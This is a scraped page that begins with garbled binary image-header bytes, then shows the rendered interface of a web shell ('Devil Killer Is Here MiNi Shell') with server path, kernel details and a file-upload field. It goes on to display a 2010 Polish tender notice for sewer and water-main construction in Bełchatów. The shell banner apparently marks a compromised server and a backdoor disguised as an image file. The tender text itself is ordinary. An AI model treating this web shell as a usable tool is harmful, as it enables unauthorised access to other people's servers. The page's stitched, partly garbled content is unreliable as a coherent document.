JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/104972-N-2010.html

<p class="kh_header"><b>Bełchatów: Kontrakt 03 Budowa kanalizacji sanitarnej, deszczowej i wodociągu w Osiedlu Ludwików 
w ramach projektu pn. Budowa i modernizacja systemu sieci wodno-kanalizacyjnej na terenie Miasta Bełchatowa</b><br>
<b>Numer ogłoszenia: 104972 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji "WOD-KAN" Spółka z o.o. , ul. Św. Faustyny Kowalskiej 9, 97-400 Bełchatów, woj. łódzkie, tel. 044 6338309, faks 044 6338306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodkan-belchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kontrakt 03 Budowa kanalizacji sanitarnej, deszczowej i wodociągu w Osiedlu Ludwików 
w ramach projektu pn. Budowa i modernizacja systemu sieci wodno-kanalizacyjnej na terenie Miasta Bełchatowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  :
Kontrakt 03 Budowa kanalizacji sanitarnej, deszczowej i wodociągu  w Os. Ludwików- Etap I realizowany w ramach projektu pn.: Budowa  i modernizacja systemu sieci wodno-kanalizacyjnej na terenie Miasta Bełchatowa.
Kanalizację sanitarną, deszczową oraz sieć wodociągową zaprojektowano na  terenie zabudowanym i przewidzianym do zabudowy na osiedlu Ludwików w ulicach: Projektowana, Zamoście, Ludwikowska, Graniczna, Kaczeńcowa, Kletnia, Zawilcowa, Wesoła, Spacerowa, Staffa, Brzechwy, Leśmiana, Asnyka, Baczyńskiego, Wycieczkowa, Konwaliowa, Pod Górami i Zalesie.
Zasadniczy zakres robót przewidzianych do wykonania w ramach Kontraktu 03: 
1. Całkowita długość kanalizacji sanitarnej - 8309,80 mb
2. Wyprowadzenia kanalizacji sanitarnej - 2512,20 mb.
3. Przyłącza i kaskady - 47 mb.
4. Całkowita długość kanalizacji deszczowej - 7635,95 mb.
5. Wyprowadzenia kanalizacji deszczowej - 2248,80 mb.
6. Przykanaliki do wpustów ulicznych - 1394,00 mb.
7. Sieć wodociągowa PE - 4775,68 mb.
8. Wyprowadzenia sieci wodociągowej - 320 mb.
9. Odejścia hydrantowe - 30 mb.
Według rozwiązania projektowego dla kanalizacji sanitarnej ścieki sanitarne zostaną odprowadzone grawitacyjnie  z zabudowań przy ulicach na osiedlu Ludwików do istniejącego kanału O600mm w ul. Ks. Kardynała Wyszyńskiego. Roboty przewidziane do wykonania obejmują: kanał główny z rur PVC; wyprowadzenia z rur PVC.
Trasa projektowanej sieci kanalizacyjnej przebiega w pasie drogowym. Przejścia poprzeczne przez drogę zaprojektowano w części rozkopem, a w części przewiertem. Na rury przewodowe należy założyć rury ochronne stalowe. Projektowane kanały grawitacyjne posiadają średnicę O250 mm i O200 mm, a przyłącza O160 mm. Sieć jest uzbrojona w studnie rewizyjne żelbetowe O1000mm oraz węzłowe żelbetowe O1200mm.  Wyprowadzenia kanalizacyjne,                  do których będą podłączane instalacje kanalizacyjne   z poszczególnych budynków, są w granicy pomiędzy pasem drogowym a posesją, zakończone korkiem.
Odbiornikiem ścieków opadowych będzie  kanał deszczowy O1200 mm w ul. Ks. Kardynała Wyszyńskiego. Roboty do wykonania obejmują: kanały główne od O1200 mm          do O500 mm  z rur PE, kanały główne O400 mm i O300 mm z rur PVC, wyprowadzenia                 i przykanaliki do wpustów ulicznych  z rur O 200 mm PVC. Przy dużych spadkach  należy stosować rury żeliwne uszczelnione zaprawą cementową.
Trasa projektowanej sieci kanalizacji deszczowej przebiega wzdłuż ulic osiedlowych. Przejścia poprzeczne przez drogi  należy wykonać w części rozkopem, a w części przewiertem z założeniem rur stalowych osłonowych. Sieć jest uzbrojona w studnie rewizyjne          i  połączeniowe prefabrykowane z kręgów żelbetowych o średnicy od O1200mm do O1800mm, oraz studnie murowane z cegły kanalizacyjnej Re=25Mpa. Wyprowadzenia kanalizacji deszczowej są zakończone korkiem kanalizacyjnym dla rur PVC, a przykanaliki wpustem ulicznym ściekowym ze studzienką ściekową uliczną betonową z osadnikiem.
Projektowana sieć wodociągowa została dostosowana do ukształtowania terenu                           i projektowanych dróg osiedlowych. 
Zaprojektowana sieć  jest siecią pierścieniową (obwodową) - hydraulicznie najkorzystniejszą z uwagi na wzajemne powiązanie przewodów magistralnych                               i rozdzielczych, stwarzające bardzo dobre warunki przepływu wody i wyrównania ciśnień.
Projektowany wodociąg zostanie zrealizowany w technologii rur PEHD100 SDR11 O200mm,  O160mm, O110mm i O63mm łączonych przy pomocy zgrzewania doczołowego.
Do wykonania są również hydranty przeciwpożarowe nadziemne. 
Odcinki przyłączy wodociągowych z rur PEHD100 O40mm  należy uzbroić w zasuwy odcinające. 
W zakresie robót drogowych przewidziany jest demontaż istniejących nawierzchni                         i konstrukcji jezdni oraz jej odtworzenie.
Realizacja robót odbywać się będzie na podstawie Harmonogramu rzeczowo - finansowego, którego projekt, zawierający zakres rzeczowy w podziale na ulice w układzie kwartalnym, stanowi załącznik do SIWZ. Płatności wynagrodzenia, w liczbie ośmiu, powiązane są ściśle z kwartalnymi etapami Harmonogramu. Zakłada się siedem pierwszych płatności                         w wysokości ok. 12% wartości kontraktu każda, na ostatnią płatność założono ok. 16% wartości kontraktu. Ostateczny kształt Harmonogramu zostanie uzgodniony pomiędzy Zamawiającym                    a wybranym Wykonawcą zgodnie z zapisami § 2 pkt. 18 lit. a) załączonego do SIWZ projektu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.23.24.10-9, 45.23.13.00-8, 45.23.21.30-2, 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 350 000 PLN. Szczegółowe informacje na temat wadium zawarte są w pkt. 11 Instrukcji dla wykonawców -Części I SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie wykonania w okresie ostatnich 5-ciu lat (od miesiąca marca 2005 r. do miesiąca  marca 2010 r.)  a jeśli okres prowadzenia działalności jest krótszy to w tym okresie trzech zamówień podobnych (odpowiadających swoim rodzajem i technologią robotom budowlanym stanowiącym przedmiot zamówienia) w ramach, których wykonano -zgodnie            z zasadami sztuki budowlanej i prawidłowo ukończono  nie mniej niż 8 km sieci kanalizacji sanitarnej i kanalizacji deszczowej oraz 3 km sieci wodociągowej.  W celu wykazania spełniania niniejszego warunku Wykonawca winien złączyć do oferty d)	wykaz robót budowlanych w zakresie niezbędnym do wykazania  spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju , daty i miejsca wykonania oraz załączeniem dokumentów ( referencje) potwierdzających, że roboty zostały wykonane  zgodnie z zasadami sztuki budowlanej                    i prawidłowo ukończone - załącznik nr 5 do IDW. W przypadku korzystania w wymienionym zakresie z doświadczenia innych podmiotów (art. 26 ust.2b ustawy Pzp) należy dołączyć  pisemne zobowiązanie do współpracy w realizacji części  przedmiotu zamówienia. W celu przeliczenia na PLN wszystkich wartości i danych finansowych podanych w innych walutach, Zamawiający zastosuje średni kurs NBP aktualny na dzień wszczęcia postępowania.

W przypadku składania oferty przez podmioty występujące wspólnie należy do oferty dołączyć dokumenty potwierdzające spełnianie ww. warunku przynajmniej przez jeden z nich.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż dysponuje lub będzie dysponował  potencjałem     technicznym niezbędnym do wykonania zamówienia, tj. minimum:
a)	 koparka samobieżna - 3 szt.;
b)	 koparko - ładowarka - 2 szt.;
c)	 samochód ciężarowy - 4 szt.;
d)	 zagęszczarka płytowa - 4 szt.;
e)	 ubijak mechaniczny - 3 `szt.;
f)	 walec stalowy wibracyjny - 1 szt.;
g)	 walec samojezdny wibracyjny - 1 szt.;
h)	 elektronarzędzia ręczne;
i)	 maszyna wiertnicza do przewiertu poziomego - do DN350 -1 kpl.;
j)	 obudowy wykopów - 10 kpl.;
k)	 sprzęt pomiarowy: niwelatory, łaty, taśmy,.
l)	 piła do cięcia asfaltu i frezarka do asfaltu.
e)	Wykaz  sprzętu i narzędzi dostępnych Wykonawcy robót w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 4 do IDW. W przypadku polegania na potencjale technicznym innych podmiotów , do oferty należy dołączyć pisemne zobowiązanie tych podmiotów do oddania do dyspozycji potencjału technicznego na okres korzystania z niego przy wykonywaniu zamówienia.
W przypadku składania oferty przez podmioty występujące wspólnie należy do oferty dołączyć dokumenty potwierdzające spełnianie ww. warunku przynajmniej przez jeden z nich.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie
a)	osobą  do wykonywania funkcji Przedstawiciela Wykonawcy (Kierownika Kontraktu) posiadającą co najmniej 5 lat doświadczenia zawodowego w sektorze gospodarki  wodno-ściekowej,  w tym doświadczenie w zarządzaniu co najmniej              1 kontraktem na roboty budowlane o wartości nie mniejszej niż  5 mln PLN jako przedstawiciel wykonawcy pełniący funkcje Kierownika Kontraktu  lub Koordynatora. (Przy przeliczaniu wartości zrealizowanych robót rozliczonych w walucie innej niż PLN, Wykonawca zobowiązany jest zastosować przelicznik w/g średniego kursu  ustalonego przez NBP na dzień wszczęcia niniejszego postępowania.)
b)	osobą na stanowisko Kierownika Budowy posiadającą co najmniej 5 lat doświadczenia zawodowego, w tym 3 lata doświadczenia na stanowisku kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi                       w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz legitymującą się przynależnością do właściwej izby samorządu zawodowego,
c)	osobą na stanowisko Kierownika Robót Sieciowych mającą co najmniej 3 lata doświadczenia zawodowego, w tym 2 lata doświadczenia na stanowisku kierownika robót wodno-kanalizacyjnych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz legitymującą się przynależnością do właściwej izby samorządu zawodowego,
d)	osobą na stanowisko Kierownika Robót Drogowych legitymującą się   5-letnim doświadczeniem zawodowym, w tym 3 lata jako inspektor nadzoru lub kierownik budowy w zakresie robót drogowych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz legitymującą się przynależnością do właściwej izby samorządu zawodowego,

Uprawnienia muszą być zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. 2006 nr 83 poz. 578 z późniejszymi zmianami.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity:Dz.U.2006 nr 156 poz. 1118 ze zm.) oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia bez ograniczenia samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie, przedkładają te dokumenty, zgodnie wymaganiami określonymi powyżej.

Uwaga: 
Zamawiający dopuszcza, aby na stanowisko Kierownika Budowy i Kierownika Kontraktu Wykonawca przedstawił jedną osobę, spełniającą wymagania przewidziane dla obu funkcji. 
Wszystkie osoby, przewidziane do wykonania niniejszego zamówienia, wskazane                   w ofercie winny posługiwać się językiem polskim lub dysponować na stałe tłumaczem języka polskiego.

f)	Oświadczenie o dysponowaniu osobami, które będą uczestniczyć                             w wykonywaniu zamówienia - załącznik nr 3 do IDW.  W przypadku polegania na osobach zdolnych do wykonania zamówienia innych podmiotów, do oferty należy dołączyć pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonywaniu zamówienia.
W przypadku składania oferty przez podmioty występujące wspólnie należy do oferty dołączyć dokumenty potwierdzające spełnianie ww. warunku przynajmniej przez jeden z nich.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia  winien:
a)	być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na wartość co najmniej 12 mln PLN,
b)	posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 5 mln PLN, 
c)	wykazać roczne obroty ze sprzedaży w ostatnich 3 latach w wysokości, co najmniej  18 mln PLN

UWAGA:
Zgodnie z art. 26 ust 2b ustawy Pzp Wykonawca może polegać na wiedzy                                i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania                z nich przy wykonywaniu zamówienia.
W celu przeliczenia na PLN wszystkich wartości i danych finansowych podanych w innych walutach, Zamawiający zastosuje średni kurs NBP aktualny na dzień wszczęcia postępowania.

W przypadku składania oferty przez podmioty występujące wspólnie należy do oferty dołączyć dokumenty potwierdzające spełnianie ww. warunku przynajmniej przez jeden z nich (każdy dokument może dotyczyć innego podmiotu).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
